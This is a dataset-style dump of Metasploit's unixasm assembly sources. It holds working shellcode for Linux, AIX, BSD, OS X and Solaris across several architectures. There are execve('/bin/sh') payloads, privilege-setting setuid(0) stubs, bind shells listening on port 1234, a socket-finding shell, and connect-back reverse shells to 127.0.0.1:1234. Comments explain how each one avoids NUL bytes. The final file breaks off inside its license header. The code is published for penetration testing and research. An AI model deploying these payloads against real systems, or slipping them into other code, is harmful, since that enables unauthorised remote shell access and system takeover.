repo_id stringlengths 5 115 | size int64 590 5.01M | file_path stringlengths 4 212 | content stringlengths 590 5.01M |
|---|---|---|---|
OpenWireSec/metasploit | 2,331 | external/source/unixasm/lin-power-cntsockcode64.S | /*
* lin-power-cntsockcode64.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
# Linux/PowerPC64 connect-back shellcode: socket(), connect(127.0.0.1:1234),
# dup2() the socket onto fds 2..0, then execve("/bin/sh").
# Syscalls are issued via .long 0x44ffff02 -- an `sc` encoding with the
# normally-zero fields set, presumably to avoid NUL bytes in the payload
# -- NOTE(review): confirm this executes as `sc` on all targets.
.globl main
main:
cntsockcode64:
# r31 = 0; r29 = __CAL (presumably 511 -- every constant below is
# written as -511+N relative to it, to keep immediates NUL-free)
xor %r31,%r31,%r31
lil %r29,__CAL
# socket
# r28 = 1 (SOCK_STREAM), r27 = 2 (AF_INET); push args {2, 1, 0},
# then socketcall(SYS_socket, args); r26 = socket fd
cal %r28,-511+1(%r29)
cal %r27,-511+2(%r29)
stdu %r31,-8(%r1)
stdu %r28,-8(%r1)
stdu %r27,-8(%r1)
mr %r4,%r1
cal %r3,__NC_socket(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
mr %r26,%r3
# connect
# r25 = 16 = sizeof(struct sockaddr_in)
cal %r25,-511+16(%r29)
/*
 * The following GPRs result in zeros when used with liu instruction.
 * %r24, %r16, %r8, %r0
 *
 */
# Build sockaddr_in on the stack: r23 = 0x7f000001 (127.0.0.1),
# r22 = 0x04d2 (port 1234).  The unaligned `st %r27,-2(%r1)` writes
# r27 (= 2 = AF_INET) so its low halfword lands in sin_family.
liu %r23,0x7f00
oril %r23,%r23,0x0001
lil %r22,0x04d2
stu %r23,-4(%r1)
stu %r22,-4(%r1)
st %r27,-2(%r1)
mr %r21,%r1
# push {fd, &sockaddr, 16} and socketcall(SYS_connect, args)
stdu %r25,-8(%r1)
stdu %r21,-8(%r1)
stdu %r26,-8(%r1)
mr %r4,%r1
cal %r3,__NC_connect(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
0:
# dup2
# dup2(sock, fd) for fd = 2, 1, 0 (r27 still holds 2 from above)
mr %r4,%r27
mr %r3,%r26
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02
ai. %r27,%r27,-1
bge 0b
shellcode64:
# lil %r31,__CAL
# bnel updates LR even when the branch is not taken (cr0 is EQ after
# xor.), so mflr captures a PC anchor; "/bin/sh" sits 36 bytes past
# that address and stb writes its terminating NUL at +43
xor. %r5,%r5,%r5
bnel shellcode64
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)
stb %r5,-511+43(%r30)
# argv = {path, NULL} built on the stack; envp (r5) = 0
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 1,524 | external/source/unixasm/lin-x86-shellcode.s | /*
* lin-x86-shellcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# Linux/x86 shellcode fragments (int $0x80 syscalls).  Each label is an
# independently extractable entry point; assembled together they simply
# run in sequence.
.global _start
_start:
setresuidcode:
# setresuid(0, 0, 0) -- syscall 0xa4 (164); mull %ebx also zeroes edx
xorl %ecx,%ecx
xorl %ebx,%ebx
mull %ebx
movb $0xa4,%al
int $0x80
setreuidcode:
# setreuid(0, 0) -- syscall 0x46 (70)
xorl %ecx,%ecx
xorl %ebx,%ebx
pushl $0x46
popl %eax
int $0x80
setuidcode:
# setuid(0) -- syscall 0x17 (23)
xorl %ebx,%ebx
pushl $0x17
popl %eax
int $0x80
exitcode:
# exit(0) -- syscall 1
xorl %ebx,%ebx
pushl $0x01
popl %eax
int $0x80
# 24 bytes
shellcode:
# execve("/bin//sh", {path, NULL}, NULL) -- syscall 0x0b (11);
# cltd zeroes edx (envp) since eax is 0
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
cltd
movb $0x0b,%al
int $0x80
|
OpenWireSec/metasploit | 3,092 | external/source/unixasm/aix-power-bndsockcode64.S | /*
* $Id: aix-power-bndsockcode64.S 40 2008-11-17 02:45:30Z ramon $
*
* aix-power-bndsockcode64.S - AIX Power Network server code
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Compile with the following command.
* $ gcc -Wall -DAIXLEVEL -m64 -o aix-power-bndsockcode64
* aix-power-bndsockcode64.S
*
* Where AIXLEVEL is one of the currently supported AIX levels.
* -DV530 AIX 5.3.0
*
*/
#include "aix-power.h"
# AIX/Power64 bind-shell: socket/bind(*:1234)/listen/accept, duplicate
# the connection onto fds 2..0 via kfcntl, then execve("/bin/csh").
# AIX takes the syscall number in r2; calls go through the crorc +
# .long 0x44ffff02 stub addressed by r30, invoked with mtctr/bctrl --
# NOTE(review): this relies on the AIX kernel returning to LR after
# `sc`; confirm against the AIX syscall convention.
.globl .main
.csect .text[PR]
.main:
syscallcode:
# locate the stub PC-relatively: bnel updates LR even when not taken
# (cr0 EQ after xor.), then bctr jumps past the stub to the fixup below
xor. %r31,%r31,%r31
bnel syscallcode
mflr %r30
cal %r30,511(%r30)
cal %r30,-511+28(%r30)
mtctr %r30
bctr
# syscall stub: .long 0x44ffff02 is `sc` with extra bits set,
# presumably to avoid NUL bytes -- TODO confirm
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
# executed once during setup (bctr lands here): r30 = &stub
cal %r30,-8(%r30)
bndsockcode:
lil %r29,__CAL
# socket
# socket(AF_INET=2, SOCK_STREAM=1, 0); r28 = listening fd
xor %r5,%r5,%r5
cal %r4,-511+1(%r29)
cal %r3,-511+2(%r29)
cal %r2,__NC_socket(%r29)
mtctr %r30
bctrl
mr %r28,%r3
# bind
# first 8 sockaddr bytes on the stack: 0xff0204d2 = {sin_len 0xff,
# AF_INET, port 1234} followed by a zero word (INADDR_ANY); r5 = 16
cal %r5,-511+16(%r29)
liu %r27,0xff02
oril %r27,%r27,0x04d2
stu %r31,-4(%r1)
stu %r27,-4(%r1)
mr %r4,%r1
cal %r2,__NC_bind(%r29)
mtctr %r30
bctrl
# listen
# listen(sock, 0)
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_listen(%r29)
mtctr %r30
bctrl
# accept
# accept(sock, NULL, NULL); r26 = connection fd
xor %r5,%r5,%r5
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_accept(%r29)
mtctr %r30
bctrl
mr %r26,%r3
# close
# for fd = 2..0: close(fd), then kfcntl(conn, 0 /* dup */, fd)
# re-creates the freed descriptor as a copy of the connection
cal %r25,-511+2(%r29)
0:
mr %r3,%r25
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r25
xor %r4,%r4,%r4
mr %r3,%r26
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r25,%r25,-1
bge 0b
shellcode64:
# lil %r31,__CAL
# execve("/bin/csh"): the string sits 40 bytes past the bnel-captured
# return address; stb writes the terminating NUL at +48
xor. %r5,%r5,%r5
bnel shellcode64
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)
stb %r5,-511+48(%r24)
# argv = {path, NULL}; envp (r5) = 0
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
# cal %r2,__NC_execve(%r31)
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 1,567 | external/source/unixasm/lin-x86-fndsockcode.s | /*
* lin-x86-fndsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# Linux/x86 find-socket shellcode: scan fds with getpeername() until the
# peer port is 1234, dup2() that fd onto 2..0, then execve("/bin//sh").
.global _start
_start:
# 62 bytes
fndsockcode:
# build getpeername args {fd, &sockaddr, &len=0x10} on the stack;
# the fd slot (at ecx) is incremented in place each iteration
xorl %ebx,%ebx
pushl %ebx
movl %esp,%edi
pushl $0x10
pushl %esp
pushl %edi
pushl %ebx
movl %esp,%ecx
# ebx = 7 = SYS_GETPEERNAME subcall of socketcall (0x66)
movb $0x07,%bl
0:
incl (%ecx)
pushl $0x66
popl %eax
int $0x80
# sin_port at edi+2: 0xd204 is port 1234 in network byte order
cmpw $0xd204,0x02(%edi)
jne 0b
# ebx = matching fd; dup2(fd, n) for n = 2..0 -- syscall 0x3f (63)
popl %ebx
pushl $0x02
popl %ecx
1:
movb $0x3f,%al
int $0x80
decl %ecx
jns 1b
shellcode:
# execve("/bin//sh", {path, NULL}, NULL) -- syscall 0x0b; the explicit
# zeroing is commented out because eax is already 0 (dup2(fd,0) return)
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
cltd
movb $0x0b,%al
int $0x80
|
OpenWireSec/metasploit | 1,248 | external/source/unixasm/lin-power-shellcode64.S | /*
* lin-power-shellcode64.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
# Linux/PowerPC64 execve("/bin/sh") shellcode.  The syscall is issued
# via .long 0x44ffff02, an `sc` encoding with normally-zero fields set,
# presumably to avoid NUL bytes -- TODO confirm.
.globl main
main:
shellcode64:
# r31 = __CAL (presumably 511: offsets below are written -511+N);
# bnel updates LR even when not taken, giving mflr a PC anchor
lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode64
mflr %r30
cal %r30,511(%r30)
# r3 = &"/bin/sh" (36 bytes past the captured return address);
# stb writes the terminating NUL at +43
cal %r3,-511+36(%r30)
stb %r5,-511+43(%r30)
# argv = {path, NULL} on the stack; envp (r5) = 0
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
cal %r0,__NC_execve(%r31)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 1,367 | external/source/unixasm/sol-sparc-shellcode.s | /*
* sol-sparc-shellcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# Solaris/SPARC shellcode: setreuid(0,0), setuid(0), then
# execve("/bin/sh", {path, NULL}, NULL).  Syscall number in %g1,
# trap via `ta 0x08`.
.globl _start
_start:
# 00 bytes
setreuidcode:
# setreuid(0, 0) -- syscall 0xca (202)
xor %o1,%o1,%o1
xor %o0,%o0,%o0
mov 0xca,%g1
ta 0x08
setuidcode:
# setuid(0) -- syscall 0x17 (23)
xor %o0,%o0,%o0
mov 0x17,%g1
ta 0x08
shellcode:
# execve -- syscall 0x3b (59).  "/bin" is assembled in %l0 via
# sethi/or (0x2f626800 | 0x96e = 0x2f62696e), "/sh\0" in %l1; the
# pair is stored below %sp, with argv = {path, NULL} just beneath it
xor %o2,%o2,%o2
sethi %hi(0x2f62696e),%l0
or %l0,0x96e,%l0
sethi %hi(0x2f736800),%l1
std %l0,[%sp-0x08]
sub %sp,0x08,%o0
st %o0,[%sp-0x10]
st %g0,[%sp-0x0c]
sub %sp,0x10,%o1
mov 0x3b,%g1
ta 0x08
|
OpenWireSec/metasploit | 1,665 | external/source/unixasm/lin-x86-cntsockcode.s | /*
* lin-x86-cntsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# Linux/x86 connect-back shellcode: socket(), connect(127.0.0.1:1234),
# dup2() the socket onto low fds, then execve("/bin//sh").
.global _start
_start:
# 71 bytes
cntsockcode:
# socketcall(SYS_SOCKET=1, {AF_INET=2, SOCK_STREAM=1, 0});
# mull zeroes edx:eax; syscall 0x66 = socketcall
xorl %ebx,%ebx
mull %ebx
pushl %ebx
incl %ebx
pushl %ebx
pushl $0x02
movl %esp,%ecx
movb $0x66,%al
int $0x80
# the two pops realign esp so the sockaddr is rebuilt exactly at ecx:
# 127.0.0.1 (0x0100007f), port 1234 (0xd204 BE), family = bx = 2;
# then push {fd, &addr, 0x10} and incl ebx -> 3 = SYS_CONNECT
popl %ebx
popl %esi
pushl $0x0100007f
pushw $0xd204
pushw %bx
pushl $0x10
pushl %ecx
pushl %eax
movl %esp,%ecx
incl %ebx
pushl $0x66
popl %eax
int $0x80
# dup2(sock, n) for n = 3..0 -- syscall 0x3f; the popped fd becomes
# the oldfd (ebx) and its value seeds the countdown in ecx
popl %ecx
xchgl %ebx,%ecx
0:
movb $0x3f,%al
int $0x80
decl %ecx
jns 0b
shellcode:
# execve("/bin//sh", {path, NULL}, NULL) -- syscall 0x0b; eax is 0
# here (dup2(sock,0) return) and edx is still 0 from the mull above,
# hence the commented-out zeroing
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %ebx
movl %esp,%ecx
# cltd
movb $0x0b,%al
int $0x80
|
OpenWireSec/metasploit | 1,599 | external/source/unixasm/bsd-x86-shellcode.s | /*
* bsd-x86-shellcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# BSD/x86 shellcode fragments.  BSD syscalls read arguments from the
# stack above a dummy return-address slot, hence the extra pushes.
.global _start
_start:
setresuidcode:
# setresuid(0, 0, 0) -- syscall 0x0137 (311)
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %eax
pushl %eax
movw $0x0137,%ax
int $0x80
setreuidcode:
# setreuid(0, 0) -- syscall 0x7e (126)
xorl %eax,%eax
pushl %eax
pushl %eax
pushl %eax
movb $0x7e,%al
int $0x80
setuidcode:
# setuid(0) -- syscall 0x17 (23)
xorl %eax,%eax
pushl %eax
pushl %eax
movb $0x17,%al
int $0x80
exitcode:
# exit(0) -- syscall 1
xorl %eax,%eax
pushl %eax
movb $0x01,%al
int $0x80
# 23 bytes
shellcode:
# execve("/bin//sh", argv, NULL) -- syscall 0x3b (59).  pushl %esp
# makes argv point at the NULL pushed just before it (the same word
# serves as the envp argument); the final pushl %eax is the dummy
# return-address slot.
xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 1,686 | external/source/unixasm/bsd-x86-bndsockcode.s | /*
* bsd-x86-bndsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# BSD/x86 bind-shell: socket/bind(*:1234)/listen/accept, dup2() the
# connection onto low fds, then execve("/bin//sh").  Stack slots from
# earlier calls are deliberately reused as later arguments.
.global _start
_start:
# 73 bytes
bndsockcode:
# sockaddr_in on the stack: 0xd20402ff = bytes ff 02 04 d2 =
# {sin_len 0xff, AF_INET, port 1234}, address word 0 (INADDR_ANY);
# edi = &sockaddr
xorl %eax,%eax
pushl %eax
pushl $0xd20402ff
movl %esp,%edi
# socket(AF_INET=2, SOCK_STREAM=1, 0) -- syscall 0x61 (97); the 0x10
# pushed last fills the dummy return slot and later serves as addrlen
pushl %eax
pushl $0x01
pushl $0x02
pushl $0x10
movb $0x61,%al
int $0x80
# bind(fd, edi, 0x10) -- syscall 0x68 (104)
pushl %edi
pushl %eax
pushl %eax
pushl $0x68
popl %eax
int $0x80
# stash the fd into the stale arg slot at edi-0x14, then listen --
# 0x6a (106) -- and accept -- 0x1e (30) -- reuse the argument block
movl %eax,-0x14(%edi)
movb $0x6a,%al
int $0x80
movb $0x1e,%al
int $0x80
# dup2(conn, n) loop -- syscall 0x5a (90); the counter at edi-0x1c is
# the second pushed copy of the connection fd, counted down to 0
pushl %eax
pushl %eax
0:
pushl $0x5a
popl %eax
int $0x80
decl -0x1c(%edi)
jns 0b
shellcode:
# execve("/bin//sh", argv, NULL) -- syscall 0x3b; eax is already 0
# (dup2 return), hence the commented-out zeroing
# xorl %eax,%eax
pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 1,694 | external/source/unixasm/aix-power-shellcode64.S | /*
* $Id: aix-power-shellcode64.S 40 2008-11-17 02:45:30Z ramon $
*
* aix-power-shellcode64.S - AIX Power shellcode
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Compile with the following command.
* $ gcc -Wall -DAIXLEVEL -m64 -o aix-power-shellcode64 aix-power-shellcode64.S
*
* Where AIXLEVEL is one of the currently supported AIX levels.
* -DV410 AIX 4.1.0
* -DV420 AIX 4.2.0
* -DV430 AIX 4.3.0
* -DV433 AIX 4.3.3
* -DV530 AIX 5.3.0
*
*/
#include "aix-power.h"
# AIX/Power64 execve("/bin/csh") shellcode.  AIX takes the syscall
# number in r2; crorc + .long 0x44ffff02 is the `sc` sequence encoded
# without NUL bytes (presumably -- TODO confirm).
.globl .main
.csect .text[PR]
.main:
shellcode64:
# bnel updates LR even when not taken (cr0 EQ after xor.), anchoring
# the PC; "/bin/csh" sits 40 bytes past the captured return address
# and stb writes its terminating NUL at +48
lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode64
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+40(%r30)
stb %r5,-511+48(%r30)
# argv = {path, NULL} on the stack; envp (r5) = 0
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
cal %r2,__NC_execve(%r31)
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 2,788 | external/source/unixasm/aix-power-cntsockcode64.S | /*
* $Id: aix-power-cntsockcode64.S 40 2008-11-17 02:45:30Z ramon $
*
* aix-power-cntsockcode64.S - AIX Power Network connect code
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Compile with the following command.
* $ gcc -Wall -DAIXLEVEL -m64 -o aix-power-cntsockcode64
* aix-power-cntsockcode64.S
*
* Where AIXLEVEL is one of the currently supported AIX levels.
* -DV530 AIX 5.3.0
*
*/
#include "aix-power.h"
# AIX/Power64 connect-back shellcode: socket(), connect() to the
# sockaddr embedded below (127.0.0.1:1234), duplicate the socket onto
# fds 2..0 via kfcntl, then execve("/bin/csh").  Syscall number in r2;
# calls go through the crorc/`sc` stub in r30 via mtctr/bctrl --
# NOTE(review): relies on the AIX kernel returning to LR; confirm.
.globl .main
.csect .text[PR]
.main:
syscallcode:
# PC-relative setup: bnel updates LR even when not taken; bctr then
# skips over the embedded data/stub to the fixup instruction below
# xor. %r31,%r31,%r31
xor. %r5,%r5,%r5
bnel syscallcode
mflr %r30
cal %r30,511(%r30)
cal %r30,-511+36(%r30)
mtctr %r30
bctr
# embedded sockaddr_in: 0xff0204d2 = {sin_len 0xff, AF_INET,
# port 1234}; 0x7f000001 = 127.0.0.1
.long 0xff0204d2
.long 0x7f000001
# syscall stub (`sc` encoded with extra bits, presumably NUL-free)
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
# executed once (bctr lands here): r30 = &stub
cal %r30,-8(%r30)
cntsockcode:
lil %r29,__CAL
# socket
# socket(AF_INET=2, SOCK_STREAM=1, 0); r5 is already 0 from the xor.
# above, hence the commented-out zeroing; r28 = socket fd
# xor %r5,%r5,%r5
cal %r4,-511+1(%r29)
cal %r3,-511+2(%r29)
cal %r2,__NC_socket(%r29)
mtctr %r30
bctrl
mr %r28,%r3
# connect
# connect(sock, stub-8 = &embedded sockaddr, 16)
cal %r5,-511+16(%r29)
cal %r4,-8(%r30)
cal %r2,__NC_connect(%r29)
mtctr %r30
bctrl
# close
# for fd = 2..0: close(fd), then kfcntl(sock, 0 /* dup */, fd)
cal %r27,-511+2(%r29)
0:
mr %r3,%r27
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r27
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r27,%r27,-1
bge 0b
shellcode64:
# lil %r31,__CAL
# execve("/bin/csh"): string 40 bytes past the bnel-captured return
# address, NUL-terminated at +48
xor. %r5,%r5,%r5
bnel shellcode64
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)
stb %r5,-511+48(%r24)
# argv = {path, NULL}; envp (r5) = 0
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
# cal %r2,__NC_execve(%r31)
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 1,583 | external/source/unixasm/osx-x86-cntsockcode.s | /*
* osx-x86-cntsockcode.s
* Copyright 2006 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
# Mac OS X/x86 connect-back shellcode: socket(), connect(127.0.0.1:1234),
# dup2() the socket onto low fds, then execve("/bin//sh").
.global _start
_start:
# 65 bytes
cntsockcode:
# sockaddr_in on the stack: 0xd20402ff = {sin_len 0xff, AF_INET,
# port 1234}; 0x0100007f = 127.0.0.1; edi = &sockaddr
pushl $0x0100007f
pushl $0xd20402ff
movl %esp,%edi
# socket(AF_INET=2, SOCK_STREAM=1, 0) -- syscall 0x61 (97); the 0x10
# pushed last is the dummy return slot, reused below as addrlen
xorl %eax,%eax
pushl %eax
pushl $0x01
pushl $0x02
pushl $0x10
movb $0x61,%al
int $0x80
# connect(fd, edi, 0x10) -- syscall 0x62 (98)
pushl %edi
pushl %eax
pushl %eax
pushl $0x62
popl %eax
int $0x80
# dup2(sock, n) loop -- syscall 0x5a (90); the counter at edi-0x18 is
# the stale connect fd slot, counted down from the socket fd to 0.
# The pushl %eax here pushes 0 (connect's return) -- that word later
# terminates the "/bin//sh" string.
pushl %eax
0:
pushl $0x5a
popl %eax
int $0x80
decl -0x18(%edi)
jns 0b
shellcode:
# execve("/bin//sh") -- syscall 0x3b (59); eax is 0 (dup2(sock,0)
# return) and the zero terminator is already on the stack, hence the
# commented-out instructions
# xorl %eax,%eax
# pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
OpenWireSec/metasploit | 2,345 | external/source/unixasm/sol-x86-bndsockcode.s | /*
* sol-x86-bndsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
